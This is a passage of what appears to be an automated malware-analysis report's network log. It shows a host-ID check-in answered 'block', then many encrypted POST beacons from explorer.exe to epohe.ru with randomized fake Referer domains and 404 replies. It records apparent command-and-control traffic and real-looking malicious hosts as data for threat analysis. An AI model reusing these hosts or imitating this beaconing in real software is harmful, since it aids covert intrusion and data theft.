                                              Data Raw: 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 42 34 37 34 35 32 37 35 38 35 43 33 36 31 35 30 33 30 31 31 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 2d 2d 0d 0a
                                              Data Ascii: ------GDGDHJJDGHCAAAKEHIJKContent-Disposition: form-data; name="hwid"0B474527585C3615030116------GDGDHJJDGHCAAAKEHIJKContent-Disposition: form-data; name="build"default------GDGDHJJDGHCAAAKEHIJK--
                                              Sep 2, 2024 11:43:01.253674984 CEST210INHTTP/1.1 200 OK
                                              Date: Mon, 02 Sep 2024 09:43:01 GMT
                                              Server: Apache/2.4.41 (Ubuntu)
                                              Content-Length: 8
                                              Keep-Alive: timeout=5, max=99
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 59 6d 78 76 59 32 73 3d
                                              Data Ascii: YmxvY2s=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              29192.168.2.449768102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:44:03.394293070 CEST273OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://jedxkbbxtvyjefdy.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 225
                                              Host: epohe.ru
                                              Sep 2, 2024 11:44:03.394335032 CEST225OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 30 54 e5 e7
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vu0ThztAh*V$=eY(k~G/c A@zPZ]\P(De2U\[E1IigWG
                                              Sep 2, 2024 11:44:04.317811966 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:44:04 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              30192.168.2.449769102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:44:05.049413919 CEST268OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://mgxufuqrjem.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 227
                                              Host: epohe.ru
                                              Sep 2, 2024 11:44:05.049464941 CEST227OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2d 1c c0 af
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vu-7Cjnu Q/k cb"fy0A~"JU&g`$g(FWxPOo2m\1WXzOY
                                              Sep 2, 2024 11:44:06.073779106 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:44:05 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              31192.168.2.449770102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:44:06.356914997 CEST273OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://jugejrjfmrsbqcyx.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 246
                                              Host: epohe.ru
                                              Sep 2, 2024 11:44:06.356957912 CEST246OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 21 2e e3 99
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vu!.^_BOze4>4q*B7u1SHZ)+[Gd8H1|JD/)]k0,^*Bq`tHB0e|)F
                                              Sep 2, 2024 11:44:07.581283092 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:44:07 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r
                                              Sep 2, 2024 11:44:07.581549883 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:44:07 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              32192.168.2.449771102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:44:12.082320929 CEST273OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://mgcnjvitwupuplla.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 163
                                              Host: epohe.ru
                                              Sep 2, 2024 11:44:12.082345009 CEST163OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7a 5a c9 f7
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vuzZG[ts&0Z./g%+]7IN"c
                                              Sep 2, 2024 11:44:12.998900890 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:44:12 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              33192.168.2.449772102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:44:17.668303013 CEST272OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://veyluekclhthgug.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 111
                                              Host: epohe.ru
                                              Sep 2, 2024 11:44:17.668315887 CEST111OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 76 4b ee 8e
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vuvKk$pi#5u5t]
                                              Sep 2, 2024 11:44:18.565588951 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:44:18 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              34192.168.2.449773102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:44:23.028577089 CEST273OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://xdpeyvjwjcxoduxb.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 348
                                              Host: epohe.ru
                                              Sep 2, 2024 11:44:23.028598070 CEST348OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3c 28 b4 aa
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vu<(b_hw4G4y:&uxX{A5<4GUb1%c^/,\H%d,hRQ;v^cdC2#Og'(Ca
                                              Sep 2, 2024 11:44:23.938311100 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:44:23 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              35192.168.2.449774102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:44:28.636660099 CEST270OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://ngmwxgboyrumd.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 363
                                              Host: epohe.ru
                                              Sep 2, 2024 11:44:28.636702061 CEST363OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 6e 27 e8 e8
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vun'Z7htgNr OuwF}$c}\]9 *F)LkB$>0Y8RM2TMiWi;- r@lm?_M7r0
                                              Sep 2, 2024 11:44:29.746076107 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:44:29 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              36192.168.2.449775102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:44:34.418683052 CEST273OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://dppdsmckyoiatanc.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 246
                                              Host: epohe.ru
                                              Sep 2, 2024 11:44:34.418730021 CEST246OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 66 5d e3 96
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vuf]MOUB4cu3w#5l"E1"J.VMHU,)|\HSy3wY+$"Q||dTH`-sZ
                                              Sep 2, 2024 11:44:35.445287943 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:44:35 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              37192.168.2.449776102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:44:40.828445911 CEST272OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://iunavucrkiocdvg.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 201
                                              Host: epohe.ru
                                              Sep 2, 2024 11:44:40.828496933 CEST201OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 6e 1d aa 83
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vuncbr{#@RAd$OCA,Y+Zn(0E96URPdlsIK
                                              Sep 2, 2024 11:44:41.738900900 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:44:41 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              38192.168.2.449777102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:44:46.388853073 CEST270OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://weelpnjtteeqb.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 148
                                              Host: epohe.ru
                                              Sep 2, 2024 11:44:46.388881922 CEST148OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 6f 09 d2 90
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vuofUBxg|u%Euj[]U,KPN,nIVXDA>h
                                              Sep 2, 2024 11:44:47.293251038 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:44:47 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              39192.168.2.449778102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:44:52.186712980 CEST269OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://mdaxajnxssfl.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 157
                                              Host: epohe.ru
                                              Sep 2, 2024 11:44:52.186736107 CEST157OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5f 19 b6 e6
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vu_Nb}OtRROrjHm[GCYN0hZNQQ%
                                              Sep 2, 2024 11:44:53.088325977 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:44:52 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              40192.168.2.449779102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:45:02.573009014 CEST273OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://epvctlndxvceigyl.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 243
                                              Host: epohe.ru
                                              Sep 2, 2024 11:45:02.573051929 CEST243OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 50 46 ab 9d
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vuPF&gmMd3KJc<c,T#K-LTfZ[1$CHX8!'wEJ8Zf-VBV2qX!YC
                                              Sep 2, 2024 11:45:03.508183002 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:45:03 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              41192.168.2.449780102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:45:08.353020906 CEST269OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://xbdxgcigtdnc.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 350
                                              Host: epohe.ru
                                              Sep 2, 2024 11:45:08.353049040 CEST350OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 60 28 f9 f7
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vu`(GEfkIlfi(ns,!mb!ZSG3*O@K:?dxJ/A5C"H%k%j7{X\)X_kz=@,e
                                              Sep 2, 2024 11:45:09.260143042 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:45:09 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              42192.168.2.449781102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:45:13.552021980 CEST272OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://qhwbbbidikeuoya.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 166
                                              Host: epohe.ru
                                              Sep 2, 2024 11:45:13.552045107 CEST166OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 65 22 ca 9c
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vue"b#xm|_o.<k0+YOYC=\IY*M|F)R(
                                              Sep 2, 2024 11:45:14.632817030 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:45:14 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              43192.168.2.449782102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:45:19.332861900 CEST269OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://ktmmebudltbr.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 188
                                              Host: epohe.ru
                                              Sep 2, 2024 11:45:19.332880974 CEST188OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 54 37 eb fa
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vuT7jTR;"z"q~8DP,iJtL::XnQ&<C7Z85)F#7C_-'
                                              Sep 2, 2024 11:45:20.269524097 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:45:20 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              44192.168.2.449783102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:45:24.196890116 CEST268OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://psyhdeolvmp.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 312
                                              Host: epohe.ru
                                              Sep 2, 2024 11:45:24.196913958 CEST312OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 60 0b ad f4
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vu`D{fjW0;<@oSr IIP0Gm+^mkH\UJ;7#,5->*CisUtRq,/
                                              Sep 2, 2024 11:45:25.102648020 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:45:24 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              45192.168.2.449784102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:45:29.521807909 CEST273OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://ckgifyjrwgvlwluh.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 114
                                              Host: epohe.ru
                                              Sep 2, 2024 11:45:29.521850109 CEST114OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 43 58 b5 b5
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vuCXnBZbxs"'
                                              Sep 2, 2024 11:45:30.434545040 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:45:30 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              46192.168.2.449785102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:45:34.635025024 CEST269OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://wtcwkmlaiuwf.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 334
                                              Host: epohe.ru
                                              Sep 2, 2024 11:45:34.635061979 CEST334OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2b 28 c7 be
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vu+(YSOP8dwPE>b)~L])JgPUl=9[?Op1lfK.;W!mkt=+eU%9AJt
                                              Sep 2, 2024 11:45:35.566848040 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:45:35 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              47192.168.2.449786102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:45:39.700259924 CEST270OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://asfcixluuutwn.org/
